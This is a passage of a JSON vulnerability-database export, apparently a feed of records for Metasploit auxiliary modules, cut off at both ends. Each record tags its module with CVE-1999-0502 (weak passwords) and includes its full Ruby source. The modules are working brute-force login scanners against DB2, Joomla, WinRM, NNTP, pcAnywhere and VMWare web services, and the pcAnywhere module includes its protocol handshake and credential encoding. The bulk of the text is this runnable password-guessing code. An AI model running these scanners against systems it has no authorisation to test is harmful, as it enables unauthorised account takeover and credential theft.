"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-10-03T16:45:09", "id": "MSF:AUXILIARY/SCANNER/DB2/DB2_AUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/db2'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DB2\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'DB2 Authentication Brute Force Utility',\n 'Description' => %q{This module attempts to authenticate against a DB2\n instance using username and password combinations indicated by the\n USER_FILE, PASS_FILE, and USERPASS_FILE options.},\n 'Author' => ['todb'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_userpass.txt\") ]),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_pass.txt\") ]),\n ])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DATABASE']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::DB2.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/db2/db2_auth.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T21:19:39", "description": "This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks\n", "edition": 2, "cvss3": {}, "published": "2014-07-18T04:49:25", "type": "metasploit", "title": "Joomla Bruteforce Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Joomla Bruteforce Login Utility',\n 'Description' => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',\n 'Author' => 'luisco100[at]gmail.com',\n 'References' =>\n [\n ['CVE', '1999-0502'] # Weak password Joomla\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [false, 'File containing users and passwords separated by space, one pair per line',\n File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')]),\n OptPath.new('USER_FILE', [false, 'File containing users, one per line',\n File.join(Msf::Config.data_directory, 'wordlists', \"http_default_users.txt\")]),\n OptPath.new('PASS_FILE', [false, 'File containing passwords, one per line',\n File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')]),\n OptString.new('AUTH_URI', [true, 'The URI to authenticate against', '/administrator/index.php']),\n OptString.new('FORM_URI', [true, 'The FORM URI to authenticate against' , '/administrator']),\n OptString.new('USER_VARIABLE', [true, 'The name of the variable for the user field', 'username']),\n OptString.new('PASS_VARIABLE', [true, 'The name of the variable for the password field' , 'passwd']),\n OptString.new('WORD_ERROR', [true, 'The word of message for detect that login fail', 'mod-login-username'])\n ])\n\n register_autofilter_ports([80, 443])\n end\n\n def find_auth_uri\n if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0\n paths = [datastore['AUTH_URI']]\n else\n paths = %w(\n /\n /administrator/\n )\n end\n\n paths.each do |path|\n begin\n res = send_request_cgi(\n 'uri' => path,\n 'method' => 'GET'\n )\n rescue ::Rex::ConnectionError\n next\n end\n\n next unless res\n\n if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/\n path = res.headers['Location']\n vprint_status(\"#{rhost}:#{rport} - Following redirect: #{path}\")\n begin\n res = send_request_cgi(\n 'uri' => path,\n 'method' => 'GET'\n )\n rescue ::Rex::ConnectionError\n next\n end\n next unless res\n end\n\n return path\n end\n\n nil\n end\n\n def target_url\n proto = 'http'\n if rport == 443 || ssl\n proto = 'https'\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri}\"\n end\n\n def run_host(ip)\n vprint_status(\"#{rhost}:#{rport} - Searching Joomla authentication URI...\")\n @uri = find_auth_uri\n\n unless @uri\n vprint_error(\"#{rhost}:#{rport} - No URI found that asks for authentication\")\n return\n end\n\n @uri = \"/#{@uri}\" if @uri[0, 1] != '/'\n\n vprint_status(\"#{target_url} - Attempting to login...\")\n\n each_user_pass do |user, pass|\n do_login(user, pass)\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_login(user, pass)\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n response = do_web_login(user, pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n return :abort if datastore['STOP_ON_SUCCESS']\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_web_login(user, pass)\n user_var = datastore['USER_VARIABLE']\n pass_var = datastore['PASS_VARIABLE']\n\n referer_var = \"http://#{rhost}/administrator/index.php\"\n\n vprint_status(\"#{target_url} - Searching Joomla Login Response...\")\n res = login_response\n\n unless res && res.code = 200 && !res.get_cookies.blank?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Response\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Searching Joomla Login Form...\")\n hidden_value = get_login_hidden(res)\n if hidden_value.nil?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Form\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Searching Joomla Login Cookies...\")\n cookie = get_login_cookie(res)\n if cookie.blank?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Cookies\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )\")\n res = send_request_login(\n 'user_var' => user_var,\n 'pass_var' => pass_var,\n 'cookie' => cookie,\n 'referer_var' => referer_var,\n 'user' => user,\n 'pass' => pass,\n 'hidden_value' => hidden_value\n )\n\n if res\n vprint_status(\"#{target_url} - Login Response #{res.code}\")\n if res.redirect? && res.headers['Location']\n path = res.headers['Location']\n vprint_status(\"#{target_url} - Following redirect to #{path}...\")\n\n res = send_request_raw(\n 'uri' => path,\n 'method' => 'GET',\n 'cookie' => \"#{cookie}\"\n )\n end\n end\n\n return res\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n\n def send_request_login(opts = {})\n res = send_request_cgi(\n 'uri' => @uri,\n 'method' => 'POST',\n 'cookie' => \"#{opts['cookie']}\",\n 'headers' =>\n {\n 'Referer' => opts['referer_var']\n },\n 'vars_post' => {\n opts['user_var'] => opts['user'],\n opts['pass_var'] => opts['pass'],\n 'lang' => '',\n 'option' => 'com_login',\n 'task' => 'login',\n 'return' => 'aW5kZXgucGhw',\n opts['hidden_value'] => 1\n }\n )\n\n res\n end\n\n def determine_result(response)\n return :abort unless response.kind_of?(Rex::Proto::Http::Response)\n return :abort unless response.code\n\n if [200, 301, 302].include?(response.code)\n if response.to_s.include?(datastore['WORD_ERROR'])\n return :fail\n else\n return :success\n end\n end\n\n :fail\n end\n\n def login_response\n uri = normalize_uri(datastore['FORM_URI'])\n res = send_request_cgi!('uri' => uri, 'method' => 'GET')\n\n res\n end\n\n def get_login_cookie(res)\n return nil unless res.kind_of?(Rex::Proto::Http::Response)\n\n res.get_cookies\n end\n\n def get_login_hidden(res)\n return nil unless res.kind_of?(Rex::Proto::Http::Response)\n\n return nil if res.body.blank?\n\n vprint_status(\"#{target_url} - Testing Joomla 2.5 Form...\")\n form = res.body.split(/<form action=([^\\>]+) method=\"post\" id=\"form-login\"\\>(.*)<\\/form>/mi)\n\n if form.length == 1 # is not Joomla 2.5\n vprint_status(\"#{target_url} - Testing Form Joomla 3.0 Form...\")\n form = res.body.split(/<form action=([^\\>]+) method=\"post\" id=\"form-login\" class=\"form-inline\"\\>(.*)<\\/form>/mi)\n end\n\n if form.length == 1 # is not Joomla 3\n vprint_error(\"#{target_url} - Last chance to find a login form...\")\n form = res.body.split(/<form id=\"login-form\" action=([^\\>]+)\\>(.*)<\\/form>/mi)\n end\n\n begin\n input_hidden = form[2].split(/<input type=\"hidden\"([^\\>]+)\\/>/mi)\n input_id = input_hidden[7].split(\"\\\"\")\n rescue NoMethodError\n return nil\n end\n\n valor_input_id = input_id[1]\n\n valor_input_id\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/joomla_bruteforce_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T00:25:48", "description": "This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.\n", "edition": 2, "cvss3": {}, "published": "2012-10-26T00:57:29", "type": "metasploit", "title": "WinRM Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/WINRM/WINRM_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner'\nrequire 'metasploit/framework/login_scanner/winrm'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::WinRM\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'WinRM Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to a WinRM service. It currently\n works only if the remote end allows Negotiate(NTLM) authentication.\n Kerberos is not currently supported. Please note: in order to use this\n module without SSL, the 'AllowUnencrypted' winrm option must be set.\n Otherwise adjust the port and set the SSL options in the module as appropriate.\n },\n 'Author' => [ 'thelightcosine' ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DOMAIN'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::WinRM.new(\n host: ip,\n port: rport,\n proxies: datastore[\"PROXIES\"],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 10,\n framework: framework,\n framework_module: self,\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n\n def test_request\n return winrm_wql_msg(\"Select Name,Status from Win32_Service\")\n end\nend\n\n=begin\nTo set the AllowUncrypted option:\nwinrm set winrm/config/service @{AllowUnencrypted=\"true\"}\n=end\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/winrm/winrm_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-19T07:11:16", "description": "This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension. This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.\n", "edition": 2, "cvss3": {}, "published": "2017-06-15T20:25:40", "type": "metasploit", "title": "NNTP Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-03-05T19:04:49", "id": "MSF:AUXILIARY/SCANNER/NNTP/NNTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NNTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to NNTP services\n which support the AUTHINFO authentication extension.\n\n This module supports AUTHINFO USER/PASS authentication,\n but does not support AUTHINFO GENERIC or AUTHINFO SASL\n authentication methods.\n },\n 'Author' => 'bcoles',\n 'License' => MSF_LICENSE,\n 'References' => [ [ 'CVE', '1999-0502' ], # Weak password\n [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))\n register_options(\n [\n Opt::RPORT(119),\n OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),\n OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])\n ])\n end\n\n def run_host(ip)\n begin\n connect\n return :abort unless nntp?\n return :abort unless supports_authinfo?\n\n report_service :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'nntp'\n disconnect\n\n each_user_pass { |user, pass| do_login user, pass }\n rescue ::Interrupt\n raise $ERROR_INFO\n rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n print_error \"#{peer} Connection failed\"\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n rescue => e\n print_error \"#{peer} Error: #{e.class} #{e} #{e.backtrace}\"\n return\n ensure\n disconnect\n end\n end\n\n def nntp?\n banner = sock.get_once\n\n if !banner\n vprint_error \"#{peer} No response\"\n return false\n end\n\n if banner !~ /^200/\n print_error 'Unexpected reply'\n return false\n end\n\n vprint_status 'Server is a NTTP server'\n vprint_status \"Banner: #{banner}\"\n true\n end\n\n def supports_authinfo?\n sock.put \"HELP\\r\\n\"\n res = sock.get(-1)\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n\n if code.nil?\n print_error 'Server is not a NNTP server'\n return false\n end\n\n if code == 480\n vprint_warning 'Authentication is required before listing authentication capabilities.'\n return true\n end\n\n if code == 100 && res =~ /authinfo/i\n vprint_status 'Server supports AUTHINFO'\n return true\n end\n\n print_error 'Server does not support AUTHINFO'\n false\n end\n\n def do_login(user, pass)\n vprint_status \"Trying username:'#{user}' with password:'#{pass}'\"\n\n begin\n connect\n sock.get_once\n\n sock.put \"AUTHINFO USER #{user}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code != 381\n vprint_error \"#{peer} Unexpected reply. Skipping user...\"\n return :skip_user\n end\n\n sock.put \"AUTHINFO PASS #{pass}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code == 452 || code == 481\n vprint_error \"#{peer} Login failed\"\n return\n elsif code == 281\n print_good \"#{peer} Successful login with: '#{user}' : '#{pass}'\"\n report_cred ip: rhost,\n port: rport,\n service_name: 'nntp',\n user: user,\n password: pass,\n proof: code.to_s\n return :next_user\n else\n vprint_error \"#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}\"\n return\n end\n rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT\n print_error 'Connection failed'\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n return :abort\n end\n rescue => e\n print_error \"Error: #{e}\"\n return nil\n ensure\n disconnect\n end\n\n def report_cred(opts)\n service_data = { address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id }\n\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password }.merge service_data\n\n login_data = { last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof] }.merge service_data\n\n create_credential_login login_data\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/nntp/nntp_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T23:42:59", "description": "This module will test pcAnywhere logins on a range of machines and report successful logins.\n", "edition": 2, "cvss3": {}, "published": "2012-05-31T19:46:26", "type": "metasploit", "title": "PcAnywhere Login Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/PCANYWHERE/PCANYWHERE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/tcp'\n\nclass MetasploitModule < Msf::Auxiliary\n include Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n\n def initialize\n super(\n 'Name' => 'PcAnywhere Login Scanner',\n 'Description' => %q{\n This module will test pcAnywhere logins on a range of machines and\n report successful logins.\n },\n 'Author' => ['theLightCosine'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([Opt::RPORT(5631)])\n\n end\n\n def run_host(ip)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n\n each_user_pass do |user, pass|\n next if user.blank? or pass.blank?\n print_status(\"Trying #{user}:#{pass}\")\n result = do_login(user, pass)\n case result\n when :success\n print_good(\"#{ip}:#{rport} Login Successful #{user}:#{pass}\")\n report_cred(\n ip: rhost,\n port: datastore['RPORT'],\n service_name: 'pcanywhere',\n user: user,\n password: pass\n )\n return if datastore['STOP_ON_SUCCESS']\n print_status('Waiting to Re-Negotiate Connection (this may take a minute)...')\n select(nil, nil, nil, 40)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n when :fail\n print_status(\"#{ip}:#{rport} Login Failure #{user}:#{pass}\")\n when :reset\n print_status(\"#{ip}:#{rport} Login Failure #{user}:#{pass}\")\n print_status('Connection reset attempting to reconnect in 1 second')\n select(nil, nil, nil, 1)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n end\n end\n\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_login(user, pass, nsock=self.sock)\n # Check if we are already at a logon prompt\n res = nsock.get_once(-1,5)\n euser = encryption_header(encrypt(user))\n nsock.put(euser)\n res = nsock.get_once(-1,5)\n\n # See if this knocked a login prompt loose\n if pca_at_login?(res)\n nsock.put(euser)\n res = nsock.get_once(-1,5)\n end\n\n # Check if we are now at the password prompt\n unless res and res.include? 'Enter password'\n print_error(\"Problem Sending Login: #{res.inspect}\")\n return :abort\n end\n\n epass = encryption_header(encrypt(pass))\n nsock.put(epass)\n res = nsock.get_once(-1,20)\n if res.include? 'Login unsuccessful'\n disconnect()\n return :reset\n elsif res.include? 'Invalid login'\n return :fail\n else\n disconnect()\n return :success\n end\n end\n\n def pca_handshake(ip, nsock=self.sock)\n print_status('Handshaking with the pcAnywhere service')\n nsock.put(\"\\x00\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res.include? 'Please press <Enter>'\n print_error(\"Handshake(1) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6F\\x06\\xff\")\n res = nsock.get_once(-1,5)\n unless res and res.include? \"\\x78\\x02\\x1b\\x61\"\n print_error(\"Handshake(2) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6f\\x61\\x00\\x09\\x00\\xfe\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res == \"\\x1b\\x62\\x00\\x02\\x00\\x00\\x00\"\n print_error(\"Handshake(3) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6f\\x62\\x01\\x02\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res.include? \"\\x00\\x7D\\x08\"\n print_error(\"Handshake(4) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n res = nsock.get_once(-1,5) unless pca_at_login?(res)\n unless pca_at_login?(res)\n print_error(\"Handshake(5) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n end\n\n def pca_at_login?(res)\n return true if res and (res.include? 'Enter login name' or res.include? 'Enter user name' )\n return false\n end\n\n def encrypt(data)\n return '' if data.nil? or data.empty?\n return '' unless data.kind_of? String\n encrypted = ''\n encrypted << ( data.unpack('C')[0] ^ 0xab )\n data.bytes.each_with_index do |byte, idx|\n next if idx == 0\n encrypted << ( encrypted[(idx - 1),1].unpack('C')[0] ^ byte ^ (idx - 1) )\n end\n return encrypted\n end\n\n def encryption_header(data)\n header = [6,data.size].pack('CC')\n header << data\n return header\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T18:28:19", "description": "This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI\n", "edition": 2, "cvss3": {}, "published": "2012-02-06T16:15:05", "type": "metasploit", "title": "VMWare Web Login Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2018-11-01T07:26:12", "id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Web Login Scanner',\n 'Description' => 'This module attempts to authenticate to the VMWare HTTP service\n for VmWare Server, ESX, and ESXI',\n 'Author' => ['theLightCosine'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n OptString.new('URI', [true, \"The default URI to login with\", 